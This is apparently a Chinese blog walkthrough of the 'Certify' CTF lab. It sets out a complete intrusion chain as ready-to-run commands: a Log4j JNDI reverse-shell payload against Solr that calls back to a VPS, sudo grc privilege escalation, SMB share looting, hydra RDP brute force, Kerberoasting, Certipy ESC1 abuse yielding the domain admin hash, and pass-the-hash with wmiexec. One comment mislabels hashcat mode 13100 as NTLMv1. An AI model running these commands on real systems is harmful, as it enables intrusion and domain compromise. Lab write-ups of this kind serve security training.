春秋云镜-Certify
Web打点
这里可以看到直接扫到了一个solr,然后我们进入直接是可以看到log4j的依赖,然后直接打一下试试。
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.yujrzdhxzy.dgrh3.cn} |
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 118.31.166.161 |
GET /solr/admin/cores?action=${jndi:ldap://118.31.166.161:1389(VPS_ip)/Basic/ReverseShell/118.31.166.161(VPS_ip)/28888} |
反弹shell之后需要进行一个提权,suid并没有可以利用的。通过sudo -l
可以看到grc命令
通过grc可以直接提权为root
Easy right?
Maybe you should dig into my core domain network.
上传fscan直接开扫
内网
172.22.9.47:21 open |
丢个frp,然后呢看到考点存在SMB,可能需要去攻击SMB服务,这里看到47和26是开启了445,直接连接的话47可以连接成功(正常的话是需要认证的)
这里看到三个共享文件,然后选择fileshare
。
这里拿到第二个flag加上一个personnel.db文件
get命令下载
打开直接是存在三张表
通过这两张表的内容组合一下进行爆破。
proxychains4 hydra -L users.txt -P pass.txt 172.22.9.26 rdp >>result.txt |
这里可以得到两个账号。但是直接去登录RDP是失败了。
zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTY
通过账号去爆破一下SPN
hashcat -m 13100 pass -a 0 ./rockyou.txt --force #13100表示NTLMv1 |
zhangxia:MyPass2@@6
chenchen:@Passw0rd@
登录172.22.9.26
提权
下载Certipy这个工具
先查找安装了什么证书。
proxychains certipy find -u 'liupeng@xiaorang.lab' -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout |
这里可以看到安装了ESC1证书,存在漏洞问题。直接工具打,这里可能需要先加一个域名映射
proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab |
直接拿到域管的hash
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7 |
2f1b57eefb2d152196836b0516abea80
proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk |
域管hash直接横向打
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 xiaoqiuxx's Blog!